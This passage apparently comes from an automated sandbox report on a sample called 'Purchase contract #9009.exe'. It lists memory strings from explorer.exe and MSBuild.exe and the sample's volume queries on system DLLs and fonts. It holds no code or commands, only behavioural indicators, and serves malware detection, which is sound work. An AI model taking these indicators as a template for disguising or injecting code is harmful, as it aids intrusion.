Source: explorer.exe, 00000005.00000000.665240943.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp, explorer.exe, 00000005.00000000.678646316.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000005.00000000.665573323.0000000001080000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.904896244.00000000031E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Users\user\Desktop\Purchase contract #9009.exe VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
